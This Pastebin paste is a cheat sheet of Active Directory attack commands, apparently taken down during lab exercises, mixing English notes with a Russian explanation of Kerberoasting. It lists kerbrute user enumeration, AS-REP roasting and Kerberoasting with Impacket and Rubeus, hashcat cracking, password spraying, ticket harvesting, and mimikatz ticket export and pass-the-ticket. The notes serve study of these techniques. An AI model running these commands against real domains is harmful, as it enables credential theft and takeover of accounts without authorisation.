Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ./kerbrute userenum -d spookysec.local --dc 10.10.154.213 /home/shaka/users.txt #brute users
- the login was svc-admin
- to check users for UF_DONT_REQUIRE_PREAUTH flag
- GetNPUsers.py -no-pass -usersfile validusers.txt -dc-ip 10.10.6.165 spookysec.local/
- Rubeus.exe kerberoast #Kerberoasting with Rubeus
- Rubeus.exe asreproast #asreproast
- to check one user
- GetNPUsers.py spookysec.local/svc-admin -no-pass
- decrypt
- hashcat -m18200 hash.txt pass.txt
- __________________
- brute Kerberos
- echo 10.10.167.222 CONTROLLER.local >> C:\Windows\System32\drivers\etc\hosts
- Rubeus.exe brute /password:Password1 /noticket #TO BRUTE ALL USERS FOR A CERTAIN PASSWORD IN THIS CASE"Password1"
- -- Rubeus.exe harvest /interval:30 #TO harvest TGT(tickets) every 30 sec
- _______________________________
- mimikatz privelege escalation
- mimikatz.exe
- in mimikatz:
- privilege::debug #Убедитесь, что это выводит [выход '20' OK], если это не так, это означает, что у вас нет прав администратора для правильного запуска mimikatz.
- sekurlsa::tickets /export #это экспортирует все билеты .kirbi в каталог, в котором вы сейчас находитесь.
- kerberos::ptt <ticket> #запустите эту команду внутри mimikatz с билетом, который вы получили ранее. Он будет кэшировать и олицетворять данный билет.
- outside mimkatz:
- klist #to check if it went successfully
- '''Kerberoasting позволяет пользователю запрашивать служебный билет для любой службы с зарегистрированным именем участника-службы, а затем использовать этот билет для взлома пароля службы. Если служба имеет зарегистрированное имя участника-службы, она может быть стабильной по протоколу Kerbero, однако успех атаки зависит от того, насколько надежен пароль и отслеживается ли он, а также от привилегий взломанной учетной записи службы. Чтобы перечислить учетные записи Kerberoastable, я бы предложил такой инструмент, как BloodHound, чтобы найти все учетные записи Kerberoastable, он позволит вам увидеть, какие учетные записи вы можете использовать Kerberoastable, если они являются администраторами домена, и какие соединения они имеют с остальной частью домена. Это немного выходит за рамки этой комнаты, но это отличный инструмент для поиска целевых аккаунтов.
- Чтобы выполнить атаку, мы будем использовать как Rubeus, так и Impacket, чтобы вы понимали различные инструменты для Kerberoasting. Существуют и другие инструменты, такие как kekeo и Invoke-Kerberoast, но я оставлю вас для самостоятельного изучения этих инструментов. '''
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement